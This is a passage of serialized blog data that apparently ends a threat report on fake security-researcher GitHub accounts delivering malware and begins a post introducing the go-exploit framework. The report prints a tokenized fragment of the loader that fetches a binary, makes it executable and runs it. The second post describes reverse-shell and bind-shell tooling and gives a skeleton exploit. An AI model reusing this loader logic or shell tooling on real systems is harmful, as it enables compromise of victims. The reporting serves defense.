with",[1373,96083,95639],{"class":1379},[1373,96085,1384],{"class":1383},[1373,96087,95644],{"class":11735},[1373,96089,5437],{"class":1383},[1373,96091,4713],{"class":1387},[1373,96093,95651],{"class":1391},[1373,96095,1388],{"class":1387},[1373,96097,2230],{"class":1383},[1373,96099,57330],{"class":4636},[1373,96101,55750],{"class":4640},[1373,96103,4606],{"class":1383},[1373,96105,55750],{"class":4640},[1373,96107,59],{"class":1383},[1373,96109,75355],{"class":11735},[1373,96111,1384],{"class":1383},[1373,96113,95672],{"class":11735},[1373,96115,59],{"class":1383},[1373,96117,75186],{"class":63570},[1373,96119,59],{"class":1383},[1373,96121,95681],{"class":11735},[1373,96123,1384],{"class":1383},[1373,96125,7585],{"class":11735},[1373,96127,27987],{"class":1383},[1373,96129,95690],{"class":11735},[1373,96131,11781],{"class":1383},[1373,96133,96134,96137,96139,96141,96143,96145,96147,96149,96151,96153],{"class":1375,"line":7546},[1373,96135,96136],{"class":4640},"            zf ",[1373,96138,5417],{"class":1397},[1373,96140,95702],{"class":11735},[1373,96142,1384],{"class":1383},[1373,96144,95644],{"class":11735},[1373,96146,5437],{"class":1383},[1373,96148,4713],{"class":1387},[1373,96150,11872],{"class":1391},[1373,96152,1388],{"class":1387},[1373,96154,11875],{"class":1383},[1373,96156,96157,96160,96162,96164,96166,96168,96170,96172,96174,96176,96178,96180,96182,96184,96186,96188,96190,96192,96194,96196,96198,96200,96202,96204,96206,96208,96210,96212,96214],{"class":1375,"line":7571},[1373,96158,96159],{"class":4640},"            
zf",[1373,96161,59],{"class":1383},[1373,96163,95726],{"class":11735},[1373,96165,1384],{"class":1383},[1373,96167,95521],{"class":11735},[1373,96169,59],{"class":1383},[1373,96171,7590],{"class":63570},[1373,96173,59],{"class":1383},[1373,96175,89372],{"class":11735},[1373,96177,1384],{"class":1383},[1373,96179,183],{"class":1387},[1373,96181,95945],{"class":1391},[1373,96183,183],{"class":1387},[1373,96185,15478],{"class":1397},[1373,96187,63565],{"class":11735},[1373,96189,59],{"class":1383},[1373,96191,63571],{"class":63570},[1373,96193,7035],{"class":1383},[1373,96195,183],{"class":1387},[1373,96197,95962],{"class":1391},[1373,96199,183],{"class":1387},[1373,96201,15050],{"class":1383},[1373,96203,15478],{"class":1397},[1373,96205,4883],{"class":1387},[1373,96207,95973],{"class":1391},[1373,96209,183],{"class":1387},[1373,96211,5437],{"class":1383},[1373,96213,46496],{"class":11735},[1373,96215,16761],{"class":1383},[1373,96217,96218,96220,96222,96224],{"class":1375,"line":7598},[1373,96219,96159],{"class":4640},[1373,96221,59],{"class":1383},[1373,96223,75402],{"class":11735},[1373,96225,27326],{"class":1383},[1373,96227,96228,96231,96233,96235,96237,96240,96242,96244,96246,96248,96250,96252,96254,96256,96258,96260,96262,96264,96266,96268,96270,96272,96274,96276,96278,96280,96282,96284,96286,96288,96290,96292,96294],{"class":1375,"line":7615},[1373,96229,96230],{"class":4640},"            st 
",[1373,96232,5417],{"class":1397},[1373,96234,63565],{"class":4640},[1373,96236,59],{"class":1383},[1373,96238,96239],{"class":11735},"stat",[1373,96241,1384],{"class":1383},[1373,96243,95521],{"class":11735},[1373,96245,59],{"class":1383},[1373,96247,7590],{"class":63570},[1373,96249,59],{"class":1383},[1373,96251,89372],{"class":11735},[1373,96253,1384],{"class":1383},[1373,96255,183],{"class":1387},[1373,96257,95945],{"class":1391},[1373,96259,183],{"class":1387},[1373,96261,15478],{"class":1397},[1373,96263,63565],{"class":11735},[1373,96265,59],{"class":1383},[1373,96267,63571],{"class":63570},[1373,96269,7035],{"class":1383},[1373,96271,183],{"class":1387},[1373,96273,95962],{"class":1391},[1373,96275,183],{"class":1387},[1373,96277,15050],{"class":1383},[1373,96279,15478],{"class":1397},[1373,96281,4883],{"class":1387},[1373,96283,95973],{"class":1391},[1373,96285,183],{"class":1387},[1373,96287,5437],{"class":1383},[1373,96289,46496],{"class":11735},[1373,96291,5437],{"class":1383},[1373,96293,46496],{"class":11735},[1373,96295,16761],{"class":1383},[1373,96297,96298,96301,96303,96305,96307,96309,96311,96313,96315,96317,96319,96321,96323,96325,96327,96329,96331,96333,96335,96337,96339,96341,96343,96345,96347,96349,96351,96353,96355,96357,96359,96361,96364,96366,96369,96371,96374,96376,96379],{"class":1375,"line":7635},[1373,96299,96300],{"class":4640},"            
os",[1373,96302,59],{"class":1383},[1373,96304,31890],{"class":11735},[1373,96306,1384],{"class":1383},[1373,96308,95521],{"class":11735},[1373,96310,59],{"class":1383},[1373,96312,7590],{"class":63570},[1373,96314,59],{"class":1383},[1373,96316,89372],{"class":11735},[1373,96318,1384],{"class":1383},[1373,96320,183],{"class":1387},[1373,96322,95945],{"class":1391},[1373,96324,183],{"class":1387},[1373,96326,15478],{"class":1397},[1373,96328,63565],{"class":11735},[1373,96330,59],{"class":1383},[1373,96332,63571],{"class":63570},[1373,96334,7035],{"class":1383},[1373,96336,183],{"class":1387},[1373,96338,95962],{"class":1391},[1373,96340,183],{"class":1387},[1373,96342,15050],{"class":1383},[1373,96344,15478],{"class":1397},[1373,96346,4883],{"class":1387},[1373,96348,95973],{"class":1391},[1373,96350,183],{"class":1387},[1373,96352,5437],{"class":1383},[1373,96354,46496],{"class":11735},[1373,96356,5437],{"class":1383},[1373,96358,46496],{"class":11735},[1373,96360,15534],{"class":1383},[1373,96362,96363],{"class":11735}," st",[1373,96365,59],{"class":1383},[1373,96367,96368],{"class":63570},"st_mode",[1373,96370,2233],{"class":1397},[1373,96372,96373],{"class":11735}," stat",[1373,96375,59],{"class":1383},[1373,96377,96378],{"class":37971},"S_IEXEC",[1373,96380,11875],{"class":1383},[1373,96382,96383,96386,96388,96390,96392,96394,96396,96398,96400,96402,96405,96407,96409,96411,96413,96415,96417,96419,96421,96423,96425,96427,96429,96431,96433,96435,96437,96439,96441,96443,96445,96447,96449,96451,96453,96455,96457,96459,96461,96463,96466,96468,96471,96473,96476,96478,96481,96483,96486,96488,96491,96493,96495,96497,96500],{"class":1375,"line":7640},[1373,96384,96385],{"class":4640},"            
subprocess",[1373,96387,59],{"class":1383},[1373,96389,95785],{"class":11735},[1373,96391,15044],{"class":1383},[1373,96393,183],{"class":1387},[1373,96395,17928],{"class":1391},[1373,96397,183],{"class":1387},[1373,96399,5437],{"class":1383},[1373,96401,4883],{"class":1387},[1373,96403,96404],{"class":1391},"-c",[1373,96406,183],{"class":1387},[1373,96408,5437],{"class":1383},[1373,96410,63565],{"class":11735},[1373,96412,59],{"class":1383},[1373,96414,7590],{"class":63570},[1373,96416,59],{"class":1383},[1373,96418,89372],{"class":11735},[1373,96420,1384],{"class":1383},[1373,96422,183],{"class":1387},[1373,96424,95945],{"class":1391},[1373,96426,183],{"class":1387},[1373,96428,15478],{"class":1397},[1373,96430,63565],{"class":11735},[1373,96432,59],{"class":1383},[1373,96434,63571],{"class":63570},[1373,96436,7035],{"class":1383},[1373,96438,183],{"class":1387},[1373,96440,95962],{"class":1391},[1373,96442,183],{"class":1387},[1373,96444,15050],{"class":1383},[1373,96446,15478],{"class":1397},[1373,96448,4883],{"class":1387},[1373,96450,95973],{"class":1391},[1373,96452,183],{"class":1387},[1373,96454,5437],{"class":1383},[1373,96456,46496],{"class":11735},[1373,96458,5437],{"class":1383},[1373,96460,46496],{"class":11735},[1373,96462,95832],{"class":1383},[1373,96464,96465],{"class":19096}," start_new_session",[1373,96467,5417],{"class":1397},[1373,96469,96470],{"class":7054},"True",[1373,96472,5437],{"class":1383},[1373,96474,96475],{"class":19096}," stdout",[1373,96477,5417],{"class":1397},[1373,96479,96480],{"class":11735},"subprocess",[1373,96482,59],{"class":1383},[1373,96484,96485],{"class":37971},"DEVNULL",[1373,96487,5437],{"class":1383},[1373,96489,96490],{"class":19096}," 
stderr",[1373,96492,5417],{"class":1397},[1373,96494,96480],{"class":11735},[1373,96496,59],{"class":1383},[1373,96498,96499],{"class":37971},"STDOUT",[1373,96501,11875],{"class":1383},[1373,96503,96504],{"class":1375,"line":7648},[1373,96505,6520],{"emptyLinePlaceholder":237},[1373,96507,96508],{"class":1375,"line":7672},[1373,96509,6520],{"emptyLinePlaceholder":237},[1373,96511,96512,96515],{"class":1375,"line":7688},[1373,96513,96514],{"class":11735},"    main",[1373,96516,27326],{"class":1383},[18,96518,96519,96520,96522,96523,1554,96525,96527,96528,96533,96534,96539],{},"Above, ",[886,96521,95408],{}," downloads one of two zip files. ",[886,96524,95901],{},[886,96526,95469],{}," are fetched from GitHub, unzipped, written to disk, and executed. The Windows binary has a very high detection rate on VirusTotal (",[47,96529,96532],{"href":96530,"rel":96531},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F777c9220670025a487f4e853987df0482fbd545189137d58a60d4ab37c1cfbb4",[51],"43\u002F71","). The Linux binary much less so (",[47,96535,96538],{"href":96536,"rel":96537},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fba4be87b3747e6c009c3aa9c9f28ce4331cd3fe2bd0d332283f226d747698733\u002Fdetection",[51],"3\u002F62","), but it contains some very obvious strings indicating its nature.",[18,96541,96542],{},[68,96543],{":width":10862,"alt":95402,"src":96544},"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fghidra.png",[18,96546,96547,96548,96550],{},"The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware. 
It’s unclear if they have been successful, but given that they’ve continued to pursue this avenue of attacks, it seems they believe they ",[1131,96549,13641],{}," be successful.",[18,96552,96553,96554,96559],{},"It isn’t clear if this is a single individual with too much time on their hands, or something more advanced like the campaign uncovered by ",[47,96555,96558],{"href":96556,"rel":96557},"https:\u002F\u002Fblog.google\u002Fthreat-analysis-group\u002Fnew-campaign-targeting-security-researchers\u002F",[51],"Google TAG in January 2021",". Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing and don’t use anything you don’t understand.",[18,96561,96562],{},"If you have engaged with any of the following accounts, consider the possibility that you’ve been compromised.",[993,96564,96566],{"id":96565},"github-accounts","GitHub Accounts",[1789,96568,96569,96575,96581,96587,96593,96599,96605],{},[25,96570,96571],{},[47,96572,96573],{"href":96573,"rel":96574},"https:\u002F\u002Fgithub.com\u002FAKuzmanHSCS",[51],[25,96576,96577],{},[47,96578,96579],{"href":96579,"rel":96580},"https:\u002F\u002Fgithub.com\u002FRShahHSCS",[51],[25,96582,96583],{},[47,96584,96585],{"href":96585,"rel":96586},"https:\u002F\u002Fgithub.com\u002FBAdithyaHSCS",[51],[25,96588,96589],{},[47,96590,96591],{"href":96591,"rel":96592},"https:\u002F\u002Fgithub.com\u002FDLandonHSCS",[51],[25,96594,96595],{},[47,96596,96597],{"href":96597,"rel":96598},"https:\u002F\u002Fgithub.com\u002FMHadzicHSCS",[51],[25,96600,96601],{},[47,96602,96603],{"href":96603,"rel":96604},"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS",[51],[25,96606,96607],{},[47,96608,96609],{"href":96609,"rel":96610},"https:\u002F\u002Fgithub.com\u002FSSankkarHSCS",[51],[993,96612,96614],{"id":96613},"malicious-repositories","Malicious 
Repositories",[1789,96616,96617,96623,96629,96635,96641,96647,96653],{},[25,96618,96619],{},[47,96620,96621],{"href":96621,"rel":96622},"https:\u002F\u002Fgithub.com\u002FAKuzmanHSCS\u002FMicrosoft-Exchange-RCE",[51],[25,96624,96625],{},[47,96626,96627],{"href":96627,"rel":96628},"https:\u002F\u002Fgithub.com\u002FMHadzicHSCS\u002FChrome-0-day",[51],[25,96630,96631],{},[47,96632,96633],{"href":96633,"rel":96634},"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix",[51],[25,96636,96637],{},[47,96638,96639],{"href":96639,"rel":96640},"https:\u002F\u002Fgithub.com\u002FBAdithyaHSCS\u002FExchange-0-Day",[51],[25,96642,96643],{},[47,96644,96645],{"href":96645,"rel":96646},"https:\u002F\u002Fgithub.com\u002FRShahHSCS\u002FDiscord-0-Day-Exploit",[51],[25,96648,96649],{},[47,96650,96651],{"href":96651,"rel":96652},"https:\u002F\u002Fgithub.com\u002FDLandonHSCS\u002FDiscord-RCE",[51],[25,96654,96655],{},[47,96656,96657],{"href":96657,"rel":96658},"https:\u002F\u002Fgithub.com\u002FSSankkarHSCS\u002FChromium-0-Day",[51],[993,96660,96662],{"id":96661},"twitter-accounts","Twitter Accounts",[1789,96664,96665,96671,96677,96683],{},[25,96666,96667],{},[47,96668,96669],{"href":96669,"rel":96670},"https:\u002F\u002Ftwitter.com\u002FAKuzmanHSCS",[51],[25,96672,96673],{},[47,96674,96675],{"href":96675,"rel":96676},"https:\u002F\u002Ftwitter.com\u002FDLandonHSCS",[51],[25,96678,96679],{},[47,96680,96681],{"href":96681,"rel":96682},"https:\u002F\u002Ftwitter.com\u002FGSandersonHSCS",[51],[25,96684,96685],{},[47,96686,96687],{"href":96687,"rel":96688},"https:\u002F\u002Ftwitter.com\u002FMHadzicHSCS",[51],[2901,96690,96691],{},"",{"title":219,"searchDepth":220,"depth":220,"links":96693},[96694,96695,96696],{"id":96565,"depth":1266,"text":96566},{"id":96613,"depth":1266,"text":96614},{"id":96661,"depth":1266,"text":96662},"VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.",{"slug":96699},"fake-repos-deliver-malicious-implant","\u002Fblog\u002Ffake-repos-deliver-malicious-implant",{"title":95224,"description":96697},"blog\u002Ffake-repos-deliver-malicious-implant","4dNQuzwy91SJB5tCc7Mu7yVqaaFevkpDC-fR1p_bsLg",{"id":96705,"title":96706,"articles":7,"authors":96707,"body":96709,"date":98679,"description":98680,"extension":234,"image":7,"link":7,"meta":98681,"navigation":237,"path":98682,"seo":98683,"series":7,"stem":98684,"subtype":7,"tags":7,"__hash__":98685},"blog\u002Fblog\u002Fgo-exploit.md","Introducing go-exploit - An Exploit Framework for Go",[96708],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":96710,"toc":98671},[96711,96724,96727,96739,96743,96802,96808,96814,96840,96843,97207,97228,97261,97264,97289,97299,97305,97311,97323,97469,97475,97495,97501,97521,97953,97964,98380,98383,98386,98649,98651,98668],[18,96712,96713,96714,10515,96718,96720,96721,96723],{},"VulnCheck is excited to announce the open-source release of our ",[47,96715,96717],{"href":14297,"rel":96716},[51],"in-house exploit framework,",[886,96719,20558],{},". Designed with simplicity and portability in mind, ",[886,96722,20558],{}," empowers exploit developers to create compact, self-contained, and consistent exploits.",[18,96725,96726],{},"Many proof-of-concept exploits rely on interpreted languages with complicated packaging systems. They implement wildly differing user interfaces, and have limited ability to be executed within a target network. 
Some exploits are integrated into massive frameworks that are burdened by years of features and dependencies which overwhelm developers and hinder the attacker's ability to deploy the exploits from unconventional locations.",[18,96728,96729,96730,96732,96733,96738],{},"To overcome these challenges, ",[886,96731,20558],{}," offers a lightweight framework with minimal dependencies, written in ",[47,96734,96737],{"href":96735,"rel":96736},"https:\u002F\u002Fgo.dev\u002F",[51],"Go","—a language renowned for its portability and cross-compilation capabilities. The framework strikes a balance between simplicity for rapid proof-of-concept development and the inclusion of sophisticated built-in features for operational use.",[61,96740,96742],{"id":96741},"key-features-and-capabilities","Key Features and Capabilities",[1789,96744,96745,96754,96760,96768,96774,96782],{},[25,96746,96747,96750,96751,96753],{},[295,96748,96749],{},"Cross-Platform Portability:"," Developed in Go, ",[886,96752,20558],{}," offers seamless cross-platform compatibility. Whether you need to execute the exploit on Windows, Linux, macOS, or an embedded system, the framework ensures consistent functionality across different operating systems, thanks to Go's ability to compile to native executables.",[25,96755,96756,96759],{},[295,96757,96758],{},"A Single Executable:"," Each exploit compiles down to a single native executable, free from external dependencies. Due to the design of the framework, unused (or unwanted) features are completely eliminated from the compiled binary.",[25,96761,96762,10515,96765,96767],{},[295,96763,96764],{},"Defined Exploitation Stages:",[886,96766,20558],{}," introduces a structured approach to exploitation with three distinct stages: target validation, version checking, and exploitation. 
This clear separation allows exploit developers to focus on specific aspects of the exploit development process, enhancing efficiency and code organization.",[25,96769,96770,96773],{},[295,96771,96772],{},"Consistent User Interface:"," The framework defines a flexible yet consistent user interface that abstracts away complexities, providing a streamlined experience for exploit developers and users.",[25,96775,96776,10515,96779,96781],{},[295,96777,96778],{},"Builtin Command and Control:",[886,96780,20558],{}," includes built-in logic for establishing connections to bind shells or accepting encrypted or unencrypted reverse shells.",[25,96783,96784,10515,96787,96789,96790,96792,96793,1246,96796,96801],{},[295,96785,96786],{},"Pre-defined Payloads:",[886,96788,20558],{}," comes with a collection of pre-created exploit payloads including traditional “lolbin” reverse shells and bind shells, as well as more complicated payloads like Java gadgets. ",[886,96791,20558],{}," also contains all the infrastructure needed for exploiting JNDI LDAP issues (e.g. ",[47,96794,83636],{"href":83634,"rel":96795},[51],[47,96797,96800],{"href":96798,"rel":96799},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-21839",[51],"CVE-2023-21839",", etc).",[61,96803,96805,96806],{"id":96804},"creating-an-exploit-with-go-exploit","Creating an Exploit with ",[886,96807,20558],{},[18,96809,96810,96811,96813],{},"Developing a new exploit using ",[886,96812,20558],{}," is designed to be a straightforward and efficient process. 
At a high level, the exploit developer only needs to create four essential functions:",[1789,96815,96816,96822,96828,96834],{},[25,96817,96818,96821],{},[886,96819,96820],{},"main()",": This function is responsible for configuring the exploit type and defining the supported command and control options.",[25,96823,96824,96827],{},[886,96825,96826],{},"ValidateTarget()",": The purpose of this function is to validate that the target system meets the criteria of the intended victim.",[25,96829,96830,96833],{},[886,96831,96832],{},"CheckVersion()",": This function is used to confirm that the target system is a susceptible host by checking its version or specific characteristics.",[25,96835,96836,96839],{},[886,96837,96838],{},"RunExploit()",": In this function, the exploitation logic is implemented, enabling the actual exploitation of the target system.",[18,96841,96842],{},"To provide a starting point, a skeleton exploit follows the structure outlined below:",[1354,96844,96846],{"className":19022,"code":96845,"language":19024,"meta":219,"style":219},"package main\n\nimport (\n    \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\"\n    \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fc2\"\n    \"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fconfig\"\n)\n\ntype MyExploit struct{}\n\nfunc (sploit MyExploit) ValidateTarget(conf *config.Config) bool {\n    return false\n}\n\nfunc (sploit MyExploit) CheckVersion(conf *config.Config) exploit.VersionCheckType {\n    return exploit.NotImplemented\n}\n\nfunc (sploit MyExploit) RunExploit(conf *config.Config) bool {\n    return true\n}\n\nfunc main() {\n    supportedC2 := []c2.Impl{\n     c2.SimpleShellServer,\n     c2.SimpleShellClient,\n    }\n    conf := config.New(config.CodeExecution, supportedC2, \"My Target\", \"CVE-2023-1270\", 80)\n\n    sploit := MyExploit{}\n    exploit.RunProgram(sploit, 
conf)\n}\n",[886,96847,96848,96854,96858,96864,96872,96881,96890,96894,96898,96910,96914,96948,96954,96958,96962,97001,97012,97016,97020,97052,97058,97062,97066,97076,97093,97104,97115,97119,97169,97173,97184,97203],{"__ignoreMap":219},[1373,96849,96850,96852],{"class":1375,"line":1376},[1373,96851,19031],{"class":1397},[1373,96853,19034],{"class":14938},[1373,96855,96856],{"class":1375,"line":220},[1373,96857,6520],{"emptyLinePlaceholder":237},[1373,96859,96860,96862],{"class":1375,"line":1266},[1373,96861,19043],{"class":4636},[1373,96863,4803],{"class":1383},[1373,96865,96866,96868,96870],{"class":1375,"line":1852},[1373,96867,19050],{"class":1387},[1373,96869,84172],{"class":19053},[1373,96871,19057],{"class":1387},[1373,96873,96874,96876,96879],{"class":1375,"line":4692},[1373,96875,19050],{"class":1387},[1373,96877,96878],{"class":19053},"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fc2",[1373,96880,19057],{"class":1387},[1373,96882,96883,96885,96888],{"class":1375,"line":4724},[1373,96884,19050],{"class":1387},[1373,96886,96887],{"class":19053},"github.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fconfig",[1373,96889,19057],{"class":1387},[1373,96891,96892],{"class":1375,"line":4756},[1373,96893,11875],{"class":1383},[1373,96895,96896],{"class":1375,"line":4768},[1373,96897,6520],{"emptyLinePlaceholder":237},[1373,96899,96900,96902,96905,96908],{"class":1375,"line":4792},[1373,96901,26399],{"class":1397},[1373,96903,96904],{"class":14938}," MyExploit",[1373,96906,96907],{"class":1397}," 
struct",[1373,96909,20595],{"class":1383},[1373,96911,96912],{"class":1375,"line":4798},[1373,96913,6520],{"emptyLinePlaceholder":237},[1373,96915,96916,96918,96920,96922,96925,96927,96930,96932,96934,96936,96938,96940,96942,96944,96946],{"class":1375,"line":4806},[1373,96917,19088],{"class":1397},[1373,96919,4641],{"class":1383},[1373,96921,38094],{"class":19096},[1373,96923,96924],{"class":14938},"MyExploit",[1373,96926,2230],{"class":1383},[1373,96928,96929],{"class":7297}," ValidateTarget",[1373,96931,1384],{"class":1383},[1373,96933,38107],{"class":19096},[1373,96935,19113],{"class":1397},[1373,96937,38112],{"class":14938},[1373,96939,59],{"class":1383},[1373,96941,38117],{"class":14938},[1373,96943,2230],{"class":1383},[1373,96945,16303],{"class":7293},[1373,96947,4765],{"class":1383},[1373,96949,96950,96952],{"class":1375,"line":4817},[1373,96951,7340],{"class":4636},[1373,96953,16195],{"class":14985},[1373,96955,96956],{"class":1375,"line":4825},[1373,96957,1855],{"class":1383},[1373,96959,96960],{"class":1375,"line":4835},[1373,96961,6520],{"emptyLinePlaceholder":237},[1373,96963,96964,96966,96968,96970,96972,96974,96977,96979,96981,96983,96985,96987,96989,96991,96994,96996,96999],{"class":1375,"line":4843},[1373,96965,19088],{"class":1397},[1373,96967,4641],{"class":1383},[1373,96969,38094],{"class":19096},[1373,96971,96924],{"class":14938},[1373,96973,2230],{"class":1383},[1373,96975,96976],{"class":7297}," CheckVersion",[1373,96978,1384],{"class":1383},[1373,96980,38107],{"class":19096},[1373,96982,19113],{"class":1397},[1373,96984,38112],{"class":14938},[1373,96986,59],{"class":1383},[1373,96988,38117],{"class":14938},[1373,96990,2230],{"class":1383},[1373,96992,96993],{"class":14938}," 
exploit",[1373,96995,59],{"class":1383},[1373,96997,96998],{"class":14938},"VersionCheckType",[1373,97000,4765],{"class":1383},[1373,97002,97003,97005,97007,97009],{"class":1375,"line":4849},[1373,97004,7340],{"class":4636},[1373,97006,96993],{"class":4640},[1373,97008,59],{"class":1383},[1373,97010,97011],{"class":4640},"NotImplemented\n",[1373,97013,97014],{"class":1375,"line":4877},[1373,97015,1855],{"class":1383},[1373,97017,97018],{"class":1375,"line":4915},[1373,97019,6520],{"emptyLinePlaceholder":237},[1373,97021,97022,97024,97026,97028,97030,97032,97034,97036,97038,97040,97042,97044,97046,97048,97050],{"class":1375,"line":4931},[1373,97023,19088],{"class":1397},[1373,97025,4641],{"class":1383},[1373,97027,38094],{"class":19096},[1373,97029,96924],{"class":14938},[1373,97031,2230],{"class":1383},[1373,97033,38102],{"class":7297},[1373,97035,1384],{"class":1383},[1373,97037,38107],{"class":19096},[1373,97039,19113],{"class":1397},[1373,97041,38112],{"class":14938},[1373,97043,59],{"class":1383},[1373,97045,38117],{"class":14938},[1373,97047,2230],{"class":1383},[1373,97049,16303],{"class":7293},[1373,97051,4765],{"class":1383},[1373,97053,97054,97056],{"class":1375,"line":4947},[1373,97055,7340],{"class":4636},[1373,97057,38077],{"class":14985},[1373,97059,97060],{"class":1375,"line":4952},[1373,97061,1855],{"class":1383},[1373,97063,97064],{"class":1375,"line":6776},[1373,97065,6520],{"emptyLinePlaceholder":237},[1373,97067,97068,97070,97072,97074],{"class":1375,"line":6781},[1373,97069,19088],{"class":1397},[1373,97071,19186],{"class":7297},[1373,97073,7514],{"class":1383},[1373,97075,4765],{"class":1383},[1373,97077,97078,97081,97083,97085,97087,97089,97091],{"class":1375,"line":7524},[1373,97079,97080],{"class":4640},"    supportedC2 
",[1373,97082,20584],{"class":1397},[1373,97084,66801],{"class":1383},[1373,97086,26421],{"class":14938},[1373,97088,59],{"class":1383},[1373,97090,66808],{"class":14938},[1373,97092,8904],{"class":1383},[1373,97094,97095,97098,97100,97102],{"class":1375,"line":7530},[1373,97096,97097],{"class":4640},"     c2",[1373,97099,59],{"class":1383},[1373,97101,38204],{"class":4640},[1373,97103,9062],{"class":1383},[1373,97105,97106,97108,97110,97113],{"class":1375,"line":7546},[1373,97107,97097],{"class":4640},[1373,97109,59],{"class":1383},[1373,97111,97112],{"class":4640},"SimpleShellClient",[1373,97114,9062],{"class":1383},[1373,97116,97117],{"class":1375,"line":7571},[1373,97118,4795],{"class":1383},[1373,97120,97121,97124,97126,97128,97130,97133,97135,97137,97139,97141,97143,97145,97147,97149,97152,97154,97156,97158,97161,97163,97165,97167],{"class":1375,"line":7598},[1373,97122,97123],{"class":4640},"    conf ",[1373,97125,20584],{"class":1397},[1373,97127,66851],{"class":4640},[1373,97129,59],{"class":1383},[1373,97131,97132],{"class":7297},"New",[1373,97134,1384],{"class":1383},[1373,97136,38112],{"class":4640},[1373,97138,59],{"class":1383},[1373,97140,66907],{"class":4640},[1373,97142,5437],{"class":1383},[1373,97144,66912],{"class":4640},[1373,97146,5437],{"class":1383},[1373,97148,4883],{"class":1387},[1373,97150,97151],{"class":1391},"My Target",[1373,97153,183],{"class":1387},[1373,97155,5437],{"class":1383},[1373,97157,4883],{"class":1387},[1373,97159,97160],{"class":1391},"CVE-2023-1270",[1373,97162,183],{"class":1387},[1373,97164,5437],{"class":1383},[1373,97166,69795],{"class":5467},[1373,97168,11875],{"class":1383},[1373,97170,97171],{"class":1375,"line":7615},[1373,97172,6520],{"emptyLinePlaceholder":237},[1373,97174,97175,97178,97180,97182],{"class":1375,"line":7635},[1373,97176,97177],{"class":4640},"    sploit 
",[1373,97179,20584],{"class":1397},[1373,97181,96904],{"class":14938},[1373,97183,20595],{"class":1383},[1373,97185,97186,97189,97191,97193,97195,97197,97199,97201],{"class":1375,"line":7640},[1373,97187,97188],{"class":4640},"    exploit",[1373,97190,59],{"class":1383},[1373,97192,66972],{"class":7297},[1373,97194,1384],{"class":1383},[1373,97196,66977],{"class":4640},[1373,97198,5437],{"class":1383},[1373,97200,20633],{"class":4640},[1373,97202,11875],{"class":1383},[1373,97204,97205],{"class":1375,"line":7648},[1373,97206,1855],{"class":1383},[18,97208,97209,97210,982,97212,97215,97216,97219,97220,97222,97223,982,97225,97227],{},"To build the skeleton exploit, you'll need to create a ",[886,97211,84443],{},[886,97213,97214],{},"go.sum"," file for the project. This can be done using the ",[886,97217,97218],{},"go mod"," command. The following commands will download and validate the most recent version of ",[886,97221,20558],{}," and create the necessary ",[886,97224,84443],{},[886,97226,97214],{}," files:",[1354,97229,97231],{"className":31740,"code":97230,"language":2186,"meta":219,"style":219},"go mod init github.com\u002Fusername\u002Fexample\nGO111MODULE=on go mod tidy\n",[886,97232,97233,97245],{"__ignoreMap":219},[1373,97234,97235,97237,97239,97242],{"class":1375,"line":1376},[1373,97236,19024],{"class":2206},[1373,97238,84674],{"class":1391},[1373,97240,97241],{"class":1391}," init",[1373,97243,97244],{"class":1391}," github.com\u002Fusername\u002Fexample\n",[1373,97246,97247,97250,97252,97255,97257,97259],{"class":1375,"line":220},[1373,97248,97249],{"class":4640},"GO111MODULE",[1373,97251,5417],{"class":1397},[1373,97253,97254],{"class":1391},"on",[1373,97256,84629],{"class":2206},[1373,97258,84674],{"class":1391},[1373,97260,84677],{"class":1391},[18,97262,97263],{},"To compile the skeleton exploit, you can use a simple command like the one shown 
below:",[1354,97265,97267],{"className":31740,"code":97266,"language":2186,"meta":219,"style":219},"GO111MODULE=on go build -o exploit .\u002Fmain.go\n",[886,97268,97269],{"__ignoreMap":219},[1373,97270,97271,97273,97275,97277,97279,97282,97284,97286],{"class":1375,"line":1376},[1373,97272,97249],{"class":4640},[1373,97274,5417],{"class":1397},[1373,97276,97254],{"class":1391},[1373,97278,84629],{"class":2206},[1373,97280,97281],{"class":1391}," build",[1373,97283,39692],{"class":2209},[1373,97285,96993],{"class":1391},[1373,97287,97288],{"class":1391}," .\u002Fmain.go\n",[18,97290,97291,97292,97294,97295,97298],{},"Running this command will compile the skeleton exploit, and the resulting executable will be named ",[886,97293,22852],{},". If you want to customize the output filename, you can change the value after the ",[886,97296,97297],{},"-o"," flag.",[18,97300,97301,97302,97304],{},"Now that you have the instructions for setting up and compiling your ",[886,97303,20558],{}," exploit, let's move on to a real example to further illustrate its usage.",[61,97306,74207,97308,97310],{"id":97307},"a-go-exploit-for-cve-2022-44877",[886,97309,20558],{}," for CVE-2022-44877",[18,97312,97313,97314,97319,97320,97322],{},"In this section, we will examine an example exploit for ",[47,97315,97318],{"href":97316,"rel":97317},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-44877",[51],"CVE-2022-44877"," (CentOS Web Panel). CVE-2022-44877 is a trivial unauthenticated and remote command injection vulnerability so it’s great as a simple example. 
